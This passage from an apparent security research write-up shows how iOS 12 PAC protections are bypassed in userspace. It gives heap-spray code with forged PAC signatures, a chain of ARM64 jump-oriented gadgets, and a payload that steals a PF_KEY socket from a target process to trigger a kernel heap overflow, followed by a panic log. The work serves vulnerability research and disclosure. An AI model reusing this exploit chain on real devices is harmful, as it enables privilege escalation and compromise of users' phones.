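Putting the addresses from the walkthrough together, the sprayed page might be built along these lines (a sketch only: the function and macro names are mine, the field offsets are those quoted in the disassembly above, the block flag constants come from the open-source libclosure headers, and the values the real exploit uses may differ):

#include <stdint.h>
#include <string.h>

extern uint64_t pacia(uint64_t value, uint64_t context); // the stub above

// Offsets within the 0x1000-byte page which the OOL spray should land at
// 0x120200000 in the target.
#define OFF_FAKE_BLOCK  0x000   // fake Block_layout
#define OFF_FAKE_DESC   0x080   // fake Block_descriptor_2
#define OFF_FAKE_OBJECT 0x120   // fake OS_xpc_file_transfer

// Block flag bits from libclosure's Block_private.h.
#define BLOCK_NEEDS_FREE       (1 << 24)
#define BLOCK_HAS_COPY_DISPOSE (1 << 25)

static void build_spray_page(uint8_t *page, uint64_t xpc_file_transfer_isa,
                             uint64_t initial_pc) {
  memset(page, 0, 0x1000);

  // fake object: raw isa at +0, pointer to the fake block at +0x40
  *(uint64_t *)(page + OFF_FAKE_OBJECT + 0x00) = xpc_file_transfer_isa;
  *(uint64_t *)(page + OFF_FAKE_OBJECT + 0x40) = 0x120200000ULL + OFF_FAKE_BLOCK;

  // fake block: flags chosen so _Block_release walks all the way to the
  // dispose helper; descriptor pointer at +0x18 (read from 0x120200018)
  *(uint32_t *)(page + OFF_FAKE_BLOCK + 0x08) =
      BLOCK_NEEDS_FREE | BLOCK_HAS_COPY_DISPOSE | 2 /* refcount encoding */;
  *(uint64_t *)(page + OFF_FAKE_BLOCK + 0x18) = 0x120200000ULL + OFF_FAKE_DESC;

  // fake descriptor: the dispose pointer at +0x18 (i.e. 0x120200098) is
  // authenticated with AUTIA using its own address as context, so sign it
  // here with the shared A-family key and that context
  *(uint64_t *)(page + OFF_FAKE_DESC + 0x18) = pacia(initial_pc, 0x120200098ULL);
}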
Filling our heapspray memory with a repeated page containing such a structure, we can gain PC control :)

goto 10

Previously I might have looked to point the initial PC value to a stack pivot, allowing the chaining together of ROP gadgets by popping fake stack frames. The issue now, as we saw earlier, is that even if we gain control of the stack pointer, the spilled LR values (return addresses) are authenticated with the B-family instruction key and the stack pointer as context. This means we can't forge them from our attacking process.
Again, as with the selector cache, this is just a mitigation against a particular technique, not something which is fundamentally required for exploitation.
The end goal here is to be able to move from controlling PC once to controlling it repeatedly, ideally with arbitrary, controlled values in a few argument registers so we can chain arbitrary function calls. Really nice to have would be the ability to pass return values from one arbitrary function call as an argument to a later one.
Techniques which achieve functionality like this are sometimes referred to as JOP (Jump-Oriented Programming), which is now used as a catch-all term for techniques that chain together multiple PC controls without using the stack. All the gadgets I use here were found manually with just a few regexes in IDA Pro.
The first type of gadget I wanted was something which would call a function pointer in a loop, with some change in arguments each time. Since libxpc was already loaded into IDA, that's where I started looking. Here's a screenshot from IDA of _xpc_array_apply_f (it's easier to see the loop structure in the graph view:)

This looks like a good loop primitive. The intended functionality here is to pass each element of an xpc_array to the function pointer supplied in X2. If we can reach here with a controlled value in X0 (a fake xpc_array) and X2 (a function pointer), we can get the function pointer called in a loop with a different, controlled value in X1 each time. Specifically, it's going to read a length value from the fake xpc_array+0x18, then call the function pointer repeatedly, passing each element from the fake xpc_array backing buffer (pointed to by X0+0x20) as X1.

Gadget Collection

We need a few gadgets on either side of this loop primitive. When we first get PC control, X19 points to the base of the heap spray. We need to get from there to control of PC, X0 and X2 in order to use the loop gadget.
This instruction sequence inside libc++ gets us from X19 to X0, X1 and PC again:
18004816C:
  LDP    X0, X1, [X19,#0x48]   ; load X0 from [X19+0x48] and
                               ;      X1 from [X19+0x50]
  LDR    X8, [X0]              ; X0 is supposed to be a C++ object
                               ; pointer, so read the vtable pointer
  LDRAA  X9, [X8,#0x28]!       ; authenticate X8 (the vtable pointer)
                               ; with a zero context value and
                               ; A-family data key. Add 0x28 to the
                               ; authenticated vtable pointer and read
                               ; the function pointer there into X9
                               ; then write the target address back
                               ; into X8 (so X8 points to the function
                               ; pointer in the vtable)
  MOVK   X8, #0xD96D,LSL#48    ; load the high 16-bits of X8 with a
                               ; constant representing a type-tag for
                               ; the inheritance hierarchy expected
                               ; at this callsite
  ADD    X2, SP, #0x50+var_40
  ADD    X4, SP, #0x50+var_48
  MOV    X3, X20
  BLRAA  X9, X8                ; branch and link with authentication
                               ; using A-family instruction key and X8
                               ; (address of vtable function pointer
                               ; | (type_tag << 48)) as context
To use that we need to forge two uses of PAC A-family keys, which we can do. Note that each of these gadgets end by calling function pointers read from memory which we control. This is how we are able to link them together.
To reach our loop primitive we need to control X2 as well as X0, which we can get by chaining this sequence next:
18082B660:
  MOV     X22, X1
  MOV     X19, X0
  STR     X22, [SP,#0x50+var_48]
  MOV     W24, #0x16
  CBZ     X19, loc_18082BB3C
  CBZ     X22, loc_18082BB3C
  LDR     X8, [X19,#0x18]
  CBZ     X8, loc_18082B698
  LDR     X2, [X19,#0xC8]
  ADD     X1, SP, #0x50+var_48
  MOV     X0, X22
  BLRAAZ  X8
This also calls through a function pointer which uses PAC, but still an A-family key (with a zero context) which we can easily forge.
By pointing the fake xpc_array object into the heap spray we can now repeatedly get the same function pointer called with a different value in X1 each time. We now want to find a gadget which lets us turn that into a more controlled arbitrary function call primitive. Again we can reuse some intended functionality.
I stumbled across IODispatchCalloutFromCFMessage a while ago while reading IOKit code; it's used under the hood to power asynchronous notification callbacks in IOKit. The userspace process receives messages on a mach port receive right it owns, and from the message reads a function pointer and arguments then calls the function pointer with those arguments. I had filed it away as a potential exploitation technique for a mach port name management bug, but it also provides a nice primitive for this exploit.
The method signature is this:
void
IODispatchCalloutFromCFMessage(CFMachPortRef port __unused,
                               void *_msg,
                               CFIndex size __unused,
                               void *info __unused)
Note that all arguments apart from _msg are unused, so only X1 control is required to use this method. The function pointer to call (authenticated with the A-family instruction key and zero context) and the parameter are read from the _msg pointer. There are some constraints: you can only pass four arguments, and the second one can only be 32-bits, but this is enough to start with.
If we set IODispatchCalloutFromCFMessage as the function pointer argument to _xpc_array_apply and make each element of the fake xpc_array be a pointer to a fake mach message matching the format expected by IODispatchCalloutFromCFMessage then we can chain together an arbitrary number of basic function calls.
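The fake xpc_array itself only needs the two fields the loop gadget actually reads; as a sketch (field names are mine, offsets are the ones noted above):

#include <stdint.h>

// Each entry in the backing buffer becomes X1 for one invocation of the
// function pointer passed in X2; here every entry points at a fake mach
// message laid out the way IODispatchCalloutFromCFMessage expects.
struct fake_xpc_array {
  uint64_t header[3];   // +0x00..0x17: not relied upon here, left to the groom
  uint64_t count;       // +0x18: number of calls to make
  uint64_t *elements;   // +0x20: backing buffer of per-call X1 values
};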
There are a few more gadget primitives which make writing a full payload easier:
retcapture

The prototype of IODispatchCalloutFromCFMessage says its return type is void, but reading the assembly we can see that the return value (X0) of the function pointer it calls survives in X0 through to the end of IODispatchCalloutFromCFMessage, meaning that in practice IODispatchCalloutFromCFMessage returns the value returned by the called function pointer. This means we can wrap IODispatchCalloutFromCFMessage in another gadget which calls a controlled function with a controlled value in X1 and then writes that return value to a memory address we control.
A bit of searching finds this inside libsystem_trace:
 PACIBSP
 STP      X20, X19, [SP,#-0x10+var_10]!
 STP      X29, X30, [SP,#0x10+var_s0]
 ADD      X29, SP, #0x10
 MOV      X19, X0
 LDP      X8, X1, [X19,#0x28]
 LDR      X0, [X8,#0x18]
 MOV      X8, X0
 LDR      X9, [X8,#0x10]!
 BLRAA    X9, X8
 LDR      X8, [X19,#0x20]
 LDR      X8, [X8,#8]
 STR      X0, [X8,#0x18]
 LDP      X29, X30, [SP,#0x10+var_s0]
 LDP      X20, X19, [SP+0x10+var_10],#0x20
 RETAB
This method takes a single argument from which, through a series of dereferences, it reads a function pointer to call as well as the X1 argument to pass. It calls the function pointer then writes the return value from the call into an address read from the input argument.
If we use the initial arbitrary call gadget to call this, passing the required descriptor in X1, we can use this to call the arbitrary call gadget again, but now the return value from that inner call will be written to a controlled memory address.
By carefully choosing that memory address to overlap with the argument descriptors for later calls we can pass the return value from one arbitrary call as an argument to a later call.
memory_copy

  LDR    X9, [X0]
  STR    X9, [X3]
  B      end
end:
  MOV    X0, X8
  RET
This gadget can be called using the arbitrary call gadget to read a 64-bit value from a controlled address and write it to another controlled address.
indirect_add

  LDR    X8, [X0, #0x18]
  ADD    X8, X8, X1
  STR    X8, [X3]
  MOV    W0, #0x0
  RET
This gadget can also be called using the arbitrary call gadget and can be used to add an arbitrary value to a value read from a controlled memory address, and write that sum back to memory.
The exploit contains various macros which seek to aid combining these primitives into useful payloads. It might seem like this is quite a limited set of primitives, so let's demonstrate a practical use by building a payload to open a PF_KEY socket in the target process and smuggle it back to ourselves so we can trigger CVE-2019-6213, a kernel heap overflow not reachable from inside the app sandbox.

Stealing sock(et)s

Unix domain sockets are the canonical way to send file descriptors between processes on UNIX OSs. This is possible on iOS; indeed, see P0 issue 1123 for a bug involving them. But we have an alternative: XNU has the concept of a file_port, a mach port which wraps a file descriptor. We can use this to easily send a socket file descriptor from the remote task back to ourselves.

remote space introspection

In earlier exploits like triple_fetch I sprayed mach port send rights into the target, then guessed their names in order to send mach messages back to the attacking process. Apple have since introduced some randomization into mach port names: the generation number now wraps randomly at either 16, 32, 48 or 64. This makes guessing remote mach port names less reliable.
Given that we can chain together arbitrary function calls, what if we just remotely enumerate the mach port namespace in the target and find the name of a sprayed mach port send right in a more deterministic way?
Here's the prototype for mach_port_space_info:
kern_return_t mach_port_space_info(
  ipc_space_inspect_t task,
  ipc_info_space_t *space_info,
  ipc_info_name_array_t *table_info,
  mach_msg_type_number_t *table_infoCnt,
  ipc_info_tree_name_array_t *tree_info,
  mach_msg_type_number_t *tree_infoCnt);
For the given task port this method will return a descriptor for each mach port name in that task's mach port namespace, containing the port's name, the rights the task has and so on.
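Called directly in our own process it looks like the following sketch (the payload instead crafts the underlying MIG request by hand, and the call may be restricted on some configurations):

#include <mach/mach.h>
#include <mach/mach_error.h>
#include <mach_debug/ipc_info.h>
#include <stdio.h>

// Enumerate our own port namespace for illustration.
int main(void) {
  ipc_info_space_t space;
  ipc_info_name_array_t table = NULL;
  mach_msg_type_number_t table_count = 0;
  ipc_info_tree_name_array_t tree = NULL;
  mach_msg_type_number_t tree_count = 0;

  kern_return_t kr = mach_port_space_info(mach_task_self(), &space,
                                          &table, &table_count,
                                          &tree, &tree_count);
  if (kr != KERN_SUCCESS) {
    printf("mach_port_space_info: %s\n", mach_error_string(kr));
    return 1;
  }
  for (mach_msg_type_number_t i = 0; i < table_count; i++) {
    printf("name 0x%x type 0x%x\n", table[i].iin_name, table[i].iin_type);
  }
  return 0;
}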
It might seem at first glance like this method would be hard to call given the limitations of our loop-call gadget (only 4 arguments, with the second limited to 32 bits). The insight here is that this function is just a MIG-generated serialization function. The functionality is really reached by sending a mach message to the task port, something which can be achieved by calling mach_msg_send, which only requires control of one argument.
By sending a mach message to the task_self port with a msgh_id value of 3223 and a valid reply port, then receiving the reply via mach_msg_receive, we can get an out-of-line descriptor containing all the task's mach port names. We can use the indirect add and memory copy gadgets to read a sprayed mach port name from the mach_port_space_info reply message and send a message containing a file_port wrapping the PF_KEY socket to it.
The heap spray also contains two skeleton mach messages which the payload uses, one for mach_port_space_info and one for sending the file_port back to the attacker. Here's a pseudo-code implementation of the entire payload functionality; take a look at the real payload in unPACker.c to see this pseudocode translated into the JOP macros.
// make sure the mach_port_space_info has
// the right name for the task port
*task_port = ret_wrapper(task_self_trap())

// get the thread's mig reply port
*reply_port = ret_wrapper(mig_get_reply_port())

// write those two values into the correct places
memory_move(mach_port_space_info_msg.remote_port, task_port)
memory_move(mach_port_space_info_msg.local_port, reply_port)

// send the mach_port_space_info request
mach_msg_send(mach_port_space_info_msg)

// fill in the reply port name in the reply message
memory_move(port_space_reply.local_port, reply_port)

// receive a reply
mach_msg_receive(port_space_reply)

// the port space is guaranteed to be at least as large
// as the number of ports we sent, so add that number*4*7
// to the received OOL desc pointer
add_indirect(port_space_reply.ool.address, 4*7*0x1000)

// now we can be pretty sure that this port name is
// a send right back to the attacker
memory_move(exfil_msg.remote_port, port_space_reply.ool.address)

// this socket write should go to the correct place for the next call:
*socket = ret_wrapper(socket(X,Y,Z))

// need to call fileport_makeport(fd, &port), so need arbitrary x1
// can get that via the TINY_RET_WRAPPER
*fileport = arbitrary_x1(fileport_makeport, socket, &fileport)

// write the fileport into the exfil message
memory_move(exfil_msg.port_desc.name, fileport)

// send the exfil message
mach_msg_send(exfil_msg)
In the sender we then wait to receive a message on a port set containing the receive rights for the ports whose send rights we sprayed; if we receive a message before we time out then we read the fileport from it, extract the fd, and trigger the PF_KEY kernel bug!
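The receive side of that handoff might look like the following sketch (not the exploit's code; the struct and function names are mine, and fileport_makefd's prototype is assumed here as the private counterpart to fileport_makeport). The resulting file descriptor is what gets passed to the PF_KEY trigger, producing the panic below:

#include <mach/mach.h>

// Pull the exfil message off the port set holding our sprayed receive
// rights, then convert the fileport descriptor back into an fd.
extern int fileport_makefd(mach_port_t fileport);

typedef struct {
  mach_msg_header_t          header;
  mach_msg_body_t            body;
  mach_msg_port_descriptor_t fileport;
  mach_msg_trailer_t         trailer;
} exfil_msg_t;

static int receive_stolen_fd(mach_port_t port_set) {
  exfil_msg_t msg;
  kern_return_t kr = mach_msg(&msg.header, MACH_RCV_MSG | MACH_RCV_TIMEOUT,
                              0, sizeof(msg), port_set,
                              10000 /* ms */, MACH_PORT_NULL);
  if (kr != KERN_SUCCESS) {
    return -1;                               // timed out: the payload didn't run
  }
  return fileport_makefd(msg.fileport.name); // the PF_KEY socket
}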
panic(cpu 1 caller 0xfffffff0156b8578): "a freed zone element has been modified in zone kalloc.80: expected 0 but found 0x5c539a7c41414141, bits changed 0x5c539a7c41414141, at offset 0 of 80 in element 0xffffffe00394b3e0, cookies 0x3f0011f52a19c140 0x53521b0207bb71b"
Debugger message: panic
Memory ID: 0xff
OS version: 16A366
Kernel version: Darwin Kernel Version 18.0.0: Tue Aug 14 22:07:18 PDT 2018; root:xnu-4903.202.2~1/RELEASE_ARM64_T8020
You can download the exploit targeting iOS 12.0 on iPhone Xs here.

Conclusions

It's rare that mitigations ship with documentation detailing exactly what their purpose is. Is a mitigation trying to make a certain exploitation technique less reliable? Is it trying to eradicate a vulnerability class? Is it trying to break an exploit chain?
PAC, as currently implemented, doesn't present much of a barrier for an attacker with local code execution and a memory corruption primitive looking to escalate privileges within userspace. This was also probably not the attack model which PAC in iOS 12 was intended to defend against, but without any documentation from Apple we don't know for sure. It's important to emphasize that the private data which most users want to protect is almost all, at some point, found in userspace.
It's also important to mention that this exploit was very contrived. Firstly, turning the virtual memory logic bug into memory corruption is probably the least interesting thing you could do with it. Finding other logical consequences caused by the unexpected shared memory would be more interesting (maybe a double read of a string used as a selector?) but I just wanted a memory corruption primitive so I could experiment with PAC's resilience to memory corruption in a userspace context and I didn't have any other bugs.
Secondly, gaining PC control is probably also unnecessary. Again, this was done to demonstrate that it's still possible to chain arbitrary function calls together quite easily even with PAC. Stealing resources such as file descriptors or mach ports from remote processes without direct PC control would also be quite possible.
It's hard to call something a PAC defeat without knowing what PAC is supposed to defend against, and it's hard to say that something like PAC "raises the bar" without knowing whether anyone really has to cross that bar anyway.